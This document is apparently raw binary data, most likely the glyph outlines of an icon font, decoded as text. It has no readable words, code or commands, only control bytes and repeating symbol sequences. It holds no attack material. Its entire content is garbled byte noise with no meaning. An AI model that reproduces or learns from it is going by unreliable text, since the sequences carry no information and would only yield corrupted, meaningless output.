	ªš+R%4'&'&'&'&/67676763"#%#&'&'&'&/#367676767‡%\‚2VqËnŸ
J%bK	™Š{4)
>K=P=‡t;//@O>U4Œ
Ï	þ K
	(
á

	&þ_ 
	
¡þ9

Çÿj­mQÍJºÃÌÕ&'&3676?676367%>'&/&7676767676&'&'&"#&'&#'&#'76'&'&#&/7676=4'&/&'67432676/76?676?32767623676/&"2#'"'&/&#'4/&'76/&##&/6376'56/4#'6?436765'67?6573?6763737"'""/&#'4'#&'"'676/&##&/765&74/74326765'674?2?337676?3%">4&"264&"264&v2j¡£Ã7		"%

?!þH	
'!+
!'

"&*	











	Z

	
	þ>(99P89Ø&&6&&$&&6&%…g3N(1Ð+?76"		
	%
Wc1(
(.+&#—‹	-* 	
+
.	,	!	J

	


			ç
	




 		
K9P99P8ó&7%&6&&6&&7%!ÿËéÚ
.Cy´ÆÙìü+;M\lz‹›­¼ÍÞñ!1:N^p+"3!26&7276'54#!"323254&#&#""363532=4&#!"%454&#!"36!26754&#!"&5463!2+";6265'32654&#!"36!26=.#'!""&56'463!2#&#&7&'&3676017674&"?676'&'"326?52'&'&56?65/01706?2'&'&#17&"72577325>&'#&726?6'&'&536?>5&41#5763>=4+&7"73>'.476/&37>1#&'&"27"'&367474/&1#";6&'.+"27676'4#'#"3326?2'&/&'"76?4'&'&2503>5&'"'"3576&&#"376?4126'&756&/"74.26;056724#'&/1"7"/&7>40"7676=4&v‚ƒ

	ÊýU
‰('	.?	y8pSü þ
þü/+Wéý®”l2D"Ÿf
ü
þϖLU+,g3g/
J
	;9

@:8)
$0C#"T
a
B	
–
	õýY
ký•$Gþbt9.æýÓB86	Œ[[
#2>~	$;	1(9;
~

F##
e	üŸ;Q`7676&'&736.'&>76'&'&'&'&7676%>'&'&'&'&'6&76'&'.DO&).?%N'
	
	
3%*H.7b9</y•	=±ý^h;x<
=
3B(P«4706‚	‡!KQ;	S/#	
 8'5@R;C)jP"H	ChFY!@	
BQ
Î',8	ÿ¨S(’®'54&/.#!"3!!"&5463!26'.?6&'&'&/&"'&'./&'&#"727676267>:26?6567676'&'&76'."57676?67
	9 
þ†

Mþœ"



D			







		
Z





T“w
"
B
ý 
&$%þ	

		






			¤¨
¨	
	ÿÿÿë;!E]tŠ›¡ª¯¶ÂÎ×âé6&'&3>7%&/&'&?676?667676&7&/&/&#&676?64%7676767'&'&'&&'&7636276?6&%&'&/&'&"&'76767'67'&'76>/&6'7&'77&'"67.6?'Õ
u·

&,.&4÷)?w‰
*]<Jz6	zš"
mE]H

ü:	!mL"!’µ¾1<+BuV

bO^Pü]˜P“	€8rr8¿]/]/*EˆÌ()gI%R&#hÌ#	6s	„	
„BŒ	

6
&F&œO<xO	
y¹	€,
+8
p84
		|
B!`2
	
)RR)a0a0J 0Îu–¹8]/!1,

>_			9.$ÿjàRJRdlx˜£«¿ËÒäí.#"&'&#"&#"&#"&#"32726732732654'676'&'676&'&'67'&'6732654'6326'>32.&'67"&/>54'677&"'&'677&'67677.'&47>72&'&'664.#"#"'6767"264&ÄW?1!.17! -1?W:  -*W?('!/0n` 1	" ,::þê*"#:2FJLD	
 ,	)Kþï;1"#"	áG3 "?2/!¼+''+3G0A"/"#"1;­)&%FJJFKt;1#"*/-';5Z//Z5;'-/C3F!/2?	.
+''+¤ -#?2/!þ\&77L77X$&V01-&$0BAG',- ,	%%V/2bU-
0C@GGAB'

*O  - 	Ql5?U/5;iþð"++"%Oö
$"!%50U?z4ñ)(G  GQ½
Cx"4"6p6"4"6pU#i;5/NFÐ"++"&Oþò- JJ/5;i 6N66M7ÿjéS%BKP%&/&'&67762&'&'&4?>6767676?62'&7&'"6&6H$7¿
)+þS.™	*-’þ£
,
!$$#…	
#2É6I#
¥**þ j-*Ôþ$)
")*
d

–2$ÿi´T’«ä'.67676%26766&;2>&'#"&?6767676&'&'&'&'&>32=6'&76;264&'#=4.'.?676.+.=6&%36?676&'&'&"676767676?676!67676?&/&'&'´DBaelršF1SJb^¿JM%ýf'

	'	(
	JR
 -		
5%W
	
14ýÊ	9Œ§
''ORi±Ÿ

0B
	þ
ÕWµ1"mSQ$%‡ÞÉSJ+?Bc!§		
		[
	#$'
0	$

	
 	&	
 þÜ	)"¡buÇlfdHI-]	 		
	RÕ=b	ÿjETF\€‰’šßþ3626'&'&67>'&'&=46767676766=&?&'%&762'&'&&=46./&'&'&76&76'.">'4&"26"276#&'&'&'&'&'&'&'/&'&6'56'32767676756%0#&767676?6764&'.7&#"/&2?>?6ê	<*.+0gþØ<z}*k_9V[6XZ&*X	,$\&4	5-AD6FH˜
7(
*

+1,M$
&0#UH-5$<>;
þ¹
	#
		
‹K<		;	#;'¦#DE

¢@*" .K_F:	3Ad\þU9.".
V	61(4)u"#	
.>	,
	Ô
9+)* 


	K	!ª–!5!3%'3#75#5%2767654'ªü•Á((‚:þjþÞ('BEŸDC'(a55¯*+®¼Ä«¼þü*RFC())(CFRÿÿÿ©ê8z“»×@l45&'&'&/&#54'&'&'&/.13!2'476767>'&?656'.?&'&//&''#7767'&'&'&/&6"#"/&'&'5&767676'&4534?&'&'&373">5&7676776?676?466'.'&76'&'&7676?276?6776&/&'5&66?7676767'&'&&'&&?6æ	&.""		$
$
þW

F$
(	[*

.-/1$$
	
Ä
( &	þb"!.02EEã“þ¹
:
(:(
	"c2O*"|	;'
.<$(!WV	AA	
(@ [/VUH:),
L˜ì	
-6'=R)+"B
!3-

T"8#(*%
0Ñ


7þc)R!		
t;
Ë3-

(	*0$G($)G
$`(,'0
(%#¤

"	F4-<þö
$88
Q0
(&8ê¥Il%"#'.?676'.676=4&'&'&'.47676?6?6#456'467676?6'&'.5]



V¬4šM€eEŠR#H0*.†Sw`D"	ý:zFj
	3er0J[[\P7#
""
í,
(#"

"! 
÷	"%
8^#W
&è©8{œª&/#?676763#&#&37$76?5'&632>&'&#&6763676337>76'&7>'&4767767>/&'#/&'&/767>'ÒV¬°ä”J!C$]s,qX
\"Ž
ýç*
E/—^*='
$."5+.0	`˜¹,Œ[L	Å)<-&8c^yd	þ÷67E.	

E	.)

Z.			v31(3*J3@-
M0#tn
tÔ-,#4		-
"-
Z
ÿiéR0!6r‹¯&/&/&/&4?622767636?6227>22?6?626?622?6762?6?62?6276?62?62676764/&'.?62?6%&76?>'&'05'&'.?6?>?62#'.76?4?>7676?6'&'&67676&'5&'&/&/&÷	Ul7ù7nSåç;	Y]<ýæýû 							<(						
					



>

	KMu+TþO1h
	

	
?x=	5…"	
;ý©:;K
`/V†	
NY%>:%4
*?. Q–Um6ù7nSäè;^Z	<ýæá 	
	
		=(		







>
MKu*U±2g
	
@=
6	"	
;þÙ::	K`0	!B}M¶%6	:®
 ?<.,!ÿýÿ‹éGhx64'&/.6?>'&/&"'&'.762?>/.676?6+&";326=&76&'#76%&'.?6&'&'."32?>&6?&תW		**@?*
!:EI !

9		ÌÎg
-l>|	
ºý•a

bUB!„ˆ 	-"¬W	
)+*?@,: FH! 

9		ÍÌg.

ºZ a
ap 	#ˆ+V pÿ«« %DI'.!&312>54'6&/7#"/'&?'&6?>327&' …ýê…Ú>j>>j>Úþ҆†àTÇ:(D=	KL
	
=U%
&U
(:ÇTr““	þ '.>j>>j>.'`
ÛÛ\þº.‡;T((
U;LL.F\ÿi˜VMVjŒ#"=6;26'56&&5&7546363227>'.'&/.?67>#4&"26/&?676'&'&/.?676&'&'.?6gä `/
5l˜L.J(YF	34Š!<+V
#gO_Oi @.W
ƒ
		
V,ö
		!:

\/
– 0-9T.Gf
"P9i42<

FSy­vI
Ul
L
2›	

9"

6ÿ¨-6?j~Œ¢«.'.#&327'&3272?'&/27676'.462".62>2765674'.67>76?&/23264&+'"366?'&'&#676?6&/&'">4&É$)-+-)
t
?=G;î;E™Ë"".""u!}	
"$!!BWLK

e‡C

3S	1(*2b-5	c~ä	'$.@-+=x0BSNV¶lQ#0""0$þ%  †

	#
	 <B7	þ¯þù

\	0Î
		¸ ÿüÿ¯ëXi|’¦'&/"/&'&'&66>76767676?6&#'%"#&#"&76767675>373&'&%'&32&/.7473/&'"&'&7633'"&'"'&7633'"–•”=)FŒŒ!@1S:,8pV
	
Âþ¼(ë/ þäž#1X°Y<1G

Æc

—I¦R‡c1‹h3
	V=		‚iP9I<6*"H8L0)
3>/El‚„
pVjYF?Q8]FŒüò(?
/$	
Š	ÿjèR8NS&'&"?6767>7&/&2767>'&'7&'&'&"76?6'67'í={¢Øm	Y'!ß$ãá[¶%I¦7&A¸ü'Q# <{¢Ùl**
Zàá%âáZ¶(%I€8?¸ý)("ÿjþR=X\&'&/&'&'.+"74&'.>3676767676&';26'&76'&'&+"%7#÷ 	½,N-('


3,#&-þl	Û
	
å

þI
-'%'K^
+@T;b(,Ÿ		þ_
ŽXH*<(#
"
	
qffÿkçQ$(,'&"3276764%'#'5477'7'7ÐÓDý¯ô$(&QþqBþ@D_R6	
#>BÁC%«F«gÓý¯$(%óQDCþ?BÕ7P	%	)DÀB&­E¬ÿi¶TQt"#&?6=4."'&/&63?676?67676&/"'4767>?67676&"'"&732>76&#'#";2656'&¥	!
bL

)#
Ø)
'2Ã&³3t²'

 'O'

		Fk7:2ý:	
"3UF4ÿiQT4Ma‹À454'#""'&'&'#"'#3367676763>%'&/&'.546&546767676767676'.'&'&'&/7>>756=67676&'&'.'.Q
	D4@4EhJH
•i#A!KBþ‚K\(=.8.1„b2L"FþI0R`5
$
	e'1
	
3	 !
#IG	
!G,	MÎ
)þ3$

ˆG
þò
%9þ»Uc
/'q 
	5!"<5	'


M)		-ÿÿé f–ÅÙì.'&&75&74&7672+'&'&/"&76'&66'5474'&'&'&.'573;6767676763676?6?67>'&'.7676'&5&76?6%'&'&=4676/&%"'&'.56'46&'&'.56'4674>7676&76'4>7676&76'&'&'.56'4j&J1B4e‹
69S2/1+5*91	‹e
Af4$OGtM&!1<0@ý	

	>$
c(
	

þ"	>6K'		/EF@©	(K:+	-F	<?©	@26Q MM>
 1?

Gx% 
%Ün$–	Ð
-	þøJB4
O@!, 15
 ' )$""
#)$"2C¹	D3
>-E		

e	F	
	R		
U		
ÿj”R0Z|´Õ÷3!&/.56767676767>7>7#"?2=4323726=&76'&#'7326/&'&'.32>7676766'&'&76%6?>76&/&'&&/%.'&7676.&'&'67632'&'&'&'&'&'&6363×+(1		$#
@	ý¨)1!9/';×
0;*T3
°#20`Å		&jA†AE'#
	
N;GcLFÁ
-)4þr#$Q:-
 	
@	
	,'3%3
þ`Ê	
	H-"0@/5R	4(

-:/AoŠc|F$@+³szZpF(7	ýú17oS
2%
1#Pi5(#>	‘A)(+F>W	
tG5MGl_%&		 4&(	
#+
	B612EB:	



	$&
2þ2#&( S<
è“Hi…¦ÃÔßé÷$-6%4.#"&=4'&/&/&/&'&#&#";!2#%#3!267>72727'#.#"#&=46;2""'&5&".=<'43367"/."'&#"&=463732&"&'."#&5&75&746;2"+"&=46;"2654."&5472%32674."&4632%"#"72676767"2>&%&64&"6.%"2>&è	
EK4‹þëÏ Þ½þ›K%R5J$A&üÆ
	q›
!	
%J
«
	1&	
i
®-	
3ýF*<;V<0+I+;/+:0+ýE00
ž'B'´'þ–(ß
	&	ã(þÑ .'7G2	" "wf
œ
›ª4B!
˜	”
Š—<V;<+/“)*“;+/;+0“*,“)$'&(&''	''ÿj>S8w’¹45'&5&'&'./&#4/&'./.3!276767>'&?656'.6?&'&//&''#7767'&'&'&'.'&6&/&'&/&?676&'&<
4).	
0

/
Xþ#!O!-	
.

	i/6<-9(
"*

à	

8. y	i[EP	1!:tY
!
4=/D\0E# 'K

% ;2


	
`'?(.1*	$	%	ð"	%=ÿj8X\„³%.'&'&'&3!2'4'&26'&76776767675466'.'.56'.7676?327676?67376&/&/&66?767>/&'&'&'&'&"76
x=	,0cD'ýâ
	"$G '
$1!7Rx`!5")–
	
			D27J-4%
hj
„p	5t	o	k"pf`±B3%/ 
57-/(3+$!>-+:B16,>1',%*È
'

V>##;Fþ¾#GA!#5"9#FD4ÿj~WNЦÅá&/&'&/&'&'&'&/&'&'&'&76&'&"&'&'&/.3!27657676?6327>76'&&767'&'&'&/&'&'&#"7&7672>'&;26'.'&'&'576765>;2?67'"'&'4?6>&63276'676'./&#7676&'&+"'&&'&+"&6~@#
		
/+
Í	ýÁ15%#1
4!+p4

	@	
		* >)'+
- 		



ï' 0%	<@&:*?		GfXQ 
6
0=&6*'.		
{+ .;#G

,2>wV	['!' -K"&(

9T	 #0	/7			^4$C
$
+

Ä!

!&!

Jÿ_XR.`z32&'&'&76767>5474/&'&>3454672>&#&"727>'.'.5".7>67>ô="4Å&CFZU¢<><>Y1,`

?@
E84=!)ŸYJt:	Bg>6^>4f,&]+.*-9R)A;~EÅZWT<=1:<RYZXCET+50ü:9è
)'wBF>PQ
[‡K>iEþ1Uj4"
+#286a "	ÿi‘R/ajs‹”¦¯&=467>76/6&#!"3!7>76#!"'&7676=4&'#.'5463!62+"264&7>4&".'&'&3!26&'%.>7.>264&"264&"}ì!&þ»##Û	P.'Jý%
Þ
	",W]
þa"rS)
,0•
n	þê
!
P$("™+*=+*, ˜
a&$]

þi/	#9%ž… !HHR£¬3!"@þ5!

þï	
5"
"Y($
'#f*=**=*,,ÿj’R%0=3#3#3#3#5335#'#33!26535&#!"!54%3!264&#!"Äoo¦nn¦nn¥oo´CTClþm7’7	
ý
<üä
Ç

ý9
qþÃ=þÃ=þÃ=þÃ]IwÁ¡77ýÅ88@
ÿjèS	#8M%>7.'327676732676735!" 7676'&'&"'&'&4767629,'hg',4†‡N		!(	W	("	þVՈtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdÏ3""3-  ¥	

	DmDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS,:J_t4&"26'"&4627&2676&'1.5&632&2676&'1&'547632" 7676'&'&"'&'&476762â1D11E0S				íB"+'9	MC +'9ˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd©"11D11				W;CB>
Ú:"B>ÏDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS#2cx264&"72"&46%&327>76&'1.6?2"&'&'&""&'&#2276?>2276?>35"" 7676'&'&"'&'&476762v'88O77(6"L
"	9


1

4


$'!
2	

2	'$
uˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdU8N88N8{7"&&
#JL
	ïD

D‘DCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS*?T2654/#72676/#76767&'&" 7676'&'&"'&'&476762"1š0Å-'šO+.!+.YB[&; ;MKˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd¥1""0-§
	<C!:$)DCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS)3<GVe" 7676'&'&"'&'&476762>7.7264&"72676.676?#&"76?#&ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdþÐ,'gg',4††!"11D10Å-';B"ø


"	
RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;3""3-  |0D10E0

B"<B

w
ÿjèS+7La4&"26'462"&%&2676&'1&5&632''77'" 7676'&'&"'&'&476762â1D10E1b				B!-'9	077/6@0@@0@0ˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdá"11D00"	N;C
B>
ó07706A/@@/AœDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS-:I%!!" 7676'&'&"'&'&476762273>.%&132676&ŸþaՈtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdý"*5D*/J#" 'ùDDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;©6D*	3$*›
<ACÿjèS)Gb|" 7676'&'&"'&'&476762"'&'.3276767674.5&'&3676767627676'&'&&'&ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdN.OA;(
':01%<-	k
4	0&)	:(þ7+&0	
4(:RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;,

6#
5
	1	"'21"q5.'"	1	'"ÿjèS)2;O]" 7676'&'&"'&'&476762"&4627.>;27676=!!+"'&5ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd±((±'#&þ¯
 2>-þ38h- &K/*RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;i(
'$
'"þ³93
!4-@yC7!8%
*&JÿjèS)<ENu~‡" 7676'&'&"'&'&476762&'&267>.%"264&&>&'"&#&.#"2>=6?6322>4."&462!"&462ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd'gg''`f`'þ³(w($&0,KK-+H++HVH*+HTI++Hþc%55J55M%55J54RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;""		"##"	ò((
$&
$'„.&

'/*HVH++H++H++HVH*÷5J55J55J55J5ÿjèS#2?Lav4&"26'462"&%&327>76&'1.6?2"2>4.".4>2" 7676'&'&"'&'&476762Õ8O77O8{G"L
"	9


œ0R00R`R00R022<23ˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd´'88N88'^"&&
#JL
	R0R`Q00Q`R0þà2<33<3DCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS);GW\" 7676'&'&"'&'&4767622676&'&776767&'7'&#"2654&273ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd…§-' !þ¦4 (4N((-¨œ
"10E1;RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;SK=B
AGþÂ<	6'ò=K=G0E00")2ÿjèS7IZo„%"264&"&462"&+"."2>54'6722>4.4632#"#"&"'676&'&>32" 7676'&'&"'&'&476762"11E01"				,JJXH++HVH*	
+HTI++Hþ	5%!"0%5Ì
!%55ވtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdÌ0D11D0b		
·-&'.+HUH++H+	+H++HUH+%5
0"&55B
5J5(DCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS)3<G" 7676'&'&"'&'&476762>7.7264&"72676.ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdþÐ,'gg',4††!"11D10Å-';B"RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;3""3-  |0D10E0

B"<BÿjèS)FOX" 7676'&'&"'&'&476762"".54&"2767654&%"&4627.>ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd…:dvd:'&@CšC@&'þÃ((±'#&RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;Ó;d::d;MC@&''&@CMx(
'"'$
ÿjèS)<EN" 7676'&'&"'&'&476762&'&267>.'"&4627.>ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd'gg''`f`'Í((±'#&RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;""		"##"	ý(
'"'$
ÿjèS
!6K#35".737654&"%&376&" 7676'&'&"'&'&476762D'&ƒM=c9*”1D1CB”¦ˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdHNBALC9d¢"00#Y0BDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS)2;S" 7676'&'&"'&'&476762"&4627.>!676'6767'4ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bd±((±'#&„þ"Pl
	

)KRDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;i(
'$
'"þå>


&*)4HF	
ÿjèS*?T%".5#26765#37654&"12676." 7676'&'&"'&'&476762ô;d:D'&ƒšƒ&'D:dà€	
1D1
ë+'<A! ˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdo9c=NBALLABN=c9>"01"$B"<C©DCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÿjèS)AJS" 7676'&'&"'&'&476762"67>2327>'.'264&"7>.ôˆtqCDDCqttqCDDCqtˆueb:;;:beêeb:;;:bdvV‹"
k‚k

	"‹»(Æ'$&RDCqtþðtqCDDCqttqCDü[;:beêeb:;;:beëdb:;ÅYL


9CC9


LYU((
#'#'
ÿjuR"ASfz’¢¯ÃÒ&'.#!"2!7676?47&'&#!"&54763!23"#"3!265&74%2;26=4&+""#"3!265&74&"#"3636265&74&"#";26=4!"#";74="#"363226=4!"#"36274=;n9-þÖ=TD0ï
K
++þ@&-,ˆ\ØÙ®	þ<;:wî¼ØÙ
®ØÙ
/_a0ˆ}}	øþÝ#}})QT*þÝ€p5H<ý*/@%P2~ŸþÁ6-'¨4*Vz
-3!o	
E	
c!E
ÿj‡R6P`u…Ÿ454&6=47>'&7&"2767674'&&'&"17674%#";25&4747&"27>!"3!2654&#!"&5463!2ï
-.(N


 D
8	4$
.8	#
	8þ¶4		4Õ	!þýf!..!‡!/#!ýyé

..	
…*Z”		F^D0@U.+5q9(.J+
3J6
_U	
!"	ZÇ/!ü¸!//![#ýÔþ”H
 !ÿj‡R/?O_oŸ¯¿ÌÜö!"3!2654&46;2+"&5'46;2+"&5'46;2+"&5'46;2+"&5+"&=46;2+"&=46;2+"&=46;2+"&=46;2+"&=46;25#!"&=463!25+"&=46;2&?64'&!"3!2654&#!"&5463!2ËþR®™ZY_4ZXZ]þy‡êc>Mýf!..!‡!/#!ýyé

@þR®()**)))þ¢((())(())+á*)j5
!Ñ/!ü¸!//![#ýÔþ”H
 !
ÿj‡R
-T]foxˆ¢7676'676?&6757'./7'&'&7676&/&'&767>37676'%2"&46"&462"&>7"&>!"3!2654&#!"&5463!2Ê

T		"?
.


	M
 +e,/4U;.
6þÖ8uýf!..!‡!/#!ýyé

. 0+#R

g	=!$F#,PZO)1"	( ,¥Iå±/!ü¸!//![#ýÔþ”H
 !ÿj‡R*>NRb|2=4/"4376=4"32>?4'&#"76=4#'"3!"3!2654&!!!"3!2654&#!"&5463!2ÌDDbz¤bDD¥þfšþfš‰ýf!..!‡!/#!ýyé

+?uv	?+þšfþ~7p/!ü¸!//![#ýÔþ”H
 !ÿj‡R2EUo3767676?5!'.'./&'&'3#3/#77!!"3!2654&#!"&5463!2šH>	þM‹
WV
)Õ‹‚>>8rrþéàýf!..!‡!/#!ýyé

Iþµ+	
H<%	’“ t0`H%_98H,W  
e/!ü¸!//![#ýÔþ”H
 !	ÿj‡R,F3#3#3#'3#!!!5!!!!"3!2654&#!"&5463!2ÀÀÀÀÀÀîÈÈ®þR®þR®þR-ýf!..!‡!/#!ýyé

/./.ÇÈ./0I.Å/!ü¸!//![#ýÔþ”H
 !ÿj‡R)b!"3!2654&#!"&5463!2.'77>.'.7>577'&677'67'Jýf!..!‡!/#!ýyé

žF*"

	I
U	I
	

	!	%U%$U
.P%U%R/!ü¸!//![#ýÔþ”H
 !Ä%2
##S(
R$R+Y$+&R#Sÿj‡R)5!"3!2654&#!"&5463!2#'#373'Jýf!..!‡!/#!ýyé

ªh=>hili@?ilR/!ü¸!//![#ýÔþ”H
 !0~~»¿€€¿ÿj‡R)¢¬"+£¬!"3!2654&#!"&5463!2&=4676?'&'#"/&76?&/&/"'&/##/#&/?273763374767237&'&7567632?'&.>273676?2367&/&7>3?'"=746?'4#"/&?67'&#/&5'##"/#&#&#"2##36362?63'>.6?'4#"'&'5"?'4#'"'"/##/##'"#37237423?4376337'5>2767&#&/"64&3"&>Jýf!..!‡!/#!ýyé

þÙ
		

	!	
	#	
!	
‹Ÿ
	




6	


R/!ü¸!//![#ýÔþ”H
 !þÆ
	
%$
	#%))Ÿ

	



	
Hª	


ÿj‡R)!"3!2654&#!"&5463!2Jýf!..!‡!/#!ýyé

R/!ü¸!//![#ýÔþ”H
 !ÿj‡R/CL\mzŒœ¬Æ54&#!'%6'&/&"3!26=4#'676"/&66?2/&'&6"&46276?2"5'7674;2+"&&=467+"?676;2+"&7676;2!"3!2654&#!"&5463!2Áþùþ€Žk	`
—	



'.1
-˜>]7	#g;,¦ýf!..!‡!/#!ýyé

}2G
cþ©î§

i


N"cŠ_0	«
"
²/!ü¸!//![#ýÔþ”H
 !ÿj‡RS[k€ª%"&'67"'67"'&/#&'67"'67"'&/#&'&/###&!.'56'&'6'.#567"'&/&'&567##!"3!2654&#!"&5463!2Â




	

!!
	


)•	
"ô



<	
	)$‘!4#

		Òýf!..!‡!/#!ýyé

Ó<8','!%!)/N
A‘	ÃUw
j	Š/!ü¸!//![#ýÔþ”H
 !ÿj‡R,Yiƒ36?6576?4?5!/&5'&'&'/.5'&+?67656?#&'37657!6!"3!2654&#!"&5463!2ž2^

þD“†„	ù14"D$+ÊÉþéA’ýf!..!‡!/#!ýyé

N"þ¯+	«<h\&	þÙ#	$$	vb1J&ß" 	
6

R)($1¨ý/!ü¸!//![#ýÔþ”H
 !ÿj‡R7]m‡2>.7&#54&+"!"#"73;2&5!26532>'4&&'&'&'&'&"&".'&/#&#53!"3!2654&#!"&5463!2%
±
þë
$

%
c		



óÝýf!..!‡!/#!ýyé

Qº%
(
þë'
þâ
Úz/!ü¸!//![#ýÔþ”H
 !ÿj‡R.H"2>4."&462'"264&!"3!2654&#!"&5463!2ô<d;;dwe;;e<%44L44%$$3%$<ýf!..!‡!/#!ýyé

9;dxd;;eve;þË5K45K4˜#4%$3%¶/!ü¸!//![#ýÔþ”H
 !	ÿj‡R(_t­Òæö'"'&'&5476?67676'&/12367676?76'&'&'&76?#"'>7'"%"327676'&'##"'&'&3547'327#"327676?'"'&'476&/#"'&'>7'"276#"'#3327676?!"3!2654&#!"&5463!2å
		

%
.$
H+
		4 !5	 J*D
.f#!%4Q¡	E''1?
:2)%
-¸A4/"a9BFNB6*
	¤ýf!..!‡!/#!ýyé

=


!
	
'2R		

""


)
!

	
I	
$*m			?

	

			

ú/!ü¸!//![#ýÔþ”H
 !ÿj‡R2fv3767>76?6?6=!/&'&5&'/&='#?#'7463233&'#"3!"3!2654&#!"&5463!2
ŸJ6(þC”…,;	æ,
4'8-:¶$I5Ͷýf!..!‡!/#!ýyé

L:rÓ+
&LÝ>&	—`17%		H)þÉ
%	
¤K8L&5:
!AU/!ü¸!//![#ýÔþ”H
 !ÿj‡R3C]>4.&"'&'&"&"&'&'&3>/&!"3!2654&#!"&5463!2? ,-@.-c
, 	0
=Ž$!4¬ýf!..!‡!/#!ýyé

–+@.0@+h	
	
	2		(
\

)AE/!ü¸!//![#ýÔþ”H
 !ÿj‡R	/I%!!33#'333#'333#33#!"3!2654&#!"&5463!2Áþ?V>Yl$Yl#Yl?Y%ýf!..!‡!/#!ýyé

|ÄþÌ"þ`~"þß~"þß þßÄ/!ü¸!//![#ýÔþ”H
 !
ÿj‡R(5?Kn{‹¥7676'&'&#&7&'&476'46.7#"'&476'6#".6"'.&'&'&/7>76762354&?265656'5!"3!2654&#!"&5463!2qJSL)1.:R+D(!Î!!?M	
		
	±
7º4#%'b:4À#3;+I841]r+,$˜EÀýf!..!‡!/#!ýyé

2:B)"
.K!0_	"
E
%&G
 

!‰

%
).5	
J	
/%/!ü¸!//![#ýÔþ”H
 !ÿj‡RVgv†–°%65?474754"1##&#;036327676?65?43?2'&#"767676%>.676&?676&%&32767676!"3!2654&#!"&5463!2É8f// 
'
	* )þb
	Û

	
þ
5
 ×ýf!..!‡!/#!ýyé

øQk# 	ô





\:"
•
	
Oi
]5		5/!ü¸!//![#ýÔþ”H
 !ÿj‡R)jr~ˆ—!"3!2654&#!"&5463!2&+"&'&'7676=676'4/.+"3267673267675&67676747&5467670##"'629Jýf!..!‡!/#!ýyé

^3-
+	

!(
8%XY Hþ2'¦
4
#K.,
R/!ü¸!//![#ýÔþ”H
 !þÜ
(>
#	
	)!9,.5*<@


œ
;§
)#
þÚ.".ÿj‡R$9R^m}—"2>4.#"#'#7236#76&#"#73337#"#'#6?63:'&+3274&'&#"372674&!"3!2654&#!"&5463!2ôEvEEvŠuEEu²


†"‡	
'
3	%õ	¯ýf!..!‡!/#!ýyé

à#<F<##<F<#©Œ,6	>ŒB#'A 
&		7Ï/!ü¸!//![#ýÔþ”H
 !ÿj‡R4=BHN^x&'5#&'5&"3#3#353635335#535#535#0#'&473#53'53#&473!"3!2654&#!"&5463!2V[WV[[[[\S][ZZZZZZ¹P[\Y[[[]\\Ëýf!..!‡!/#!ýyé

è[\ZS[R[H[T[Y\[][]þìU·\][S\UÇ/!ü¸!//![#ýÔþ”H
 !ÿj‡R)8B!"3!2654&#!"&5463!2&+35327654'&+53Jýf!..!‡!/#!ýyé

ÿ!,—[:F'(F
<=R/!ü¸!//![#ýÔþ”H
 !@þ†€!#6# †
mÿj‡R4BR`p€š!";2;2+";26=4&+"=4;2546;2=446;2+"5#!"&=463!25+"=46;25+"&=46;2!"3!2654&#!"&5463!2ßþ*ž(œ(žþˆSS
þÿÐýf!..!‡!/#!ýyé

\1þÝ__#0yV@**p/!ü¸!//![#ýÔþ”H
 !ÿj‡R#=
-'7''37'!"3!2654&#!"&5463!2ôþúþûfJ¯°JffJ¯°Jðýf!..!‡!/#!ýyé

'^_`^þû%?@|$@@c/!ü¸!//![#ýÔþ”H
 !ÿj‡R
 :
-'%''%'!"3!2654&#!"&5463!2óþþþþ–ll˜–ll¿ýf!..!‡!/#!ýyé

;^]]^ë7'^^'·6'^^'L/!ü¸!//![#ýÔþ”H
 !ÿj‡R )JSc}326=4.#"3#";5467"&462#+"3276=#53276764'&2"&46!"3!2654&#!"&5463!2¸w#"3$$v¢(	 (,	



ë-,w# ;v±
		œ	



ýf!..!‡!/#!ýyé

g#q"	
-#4" 6-ž


-5,$q
		*-9$<þâ


˜/!ü¸!//![#ýÔþ”H
 !
ÿj‡R
%1?MXdtŽ&"'%&3%25'425&%"?676'&/&?6&77676&'&'"/&"6/.!"3!2654&#!"&5463!2Rƒg•þòit&.34þÀ$P).F%f´"Dp9Ae
$e5ýf!..!‡!/#!ýyé

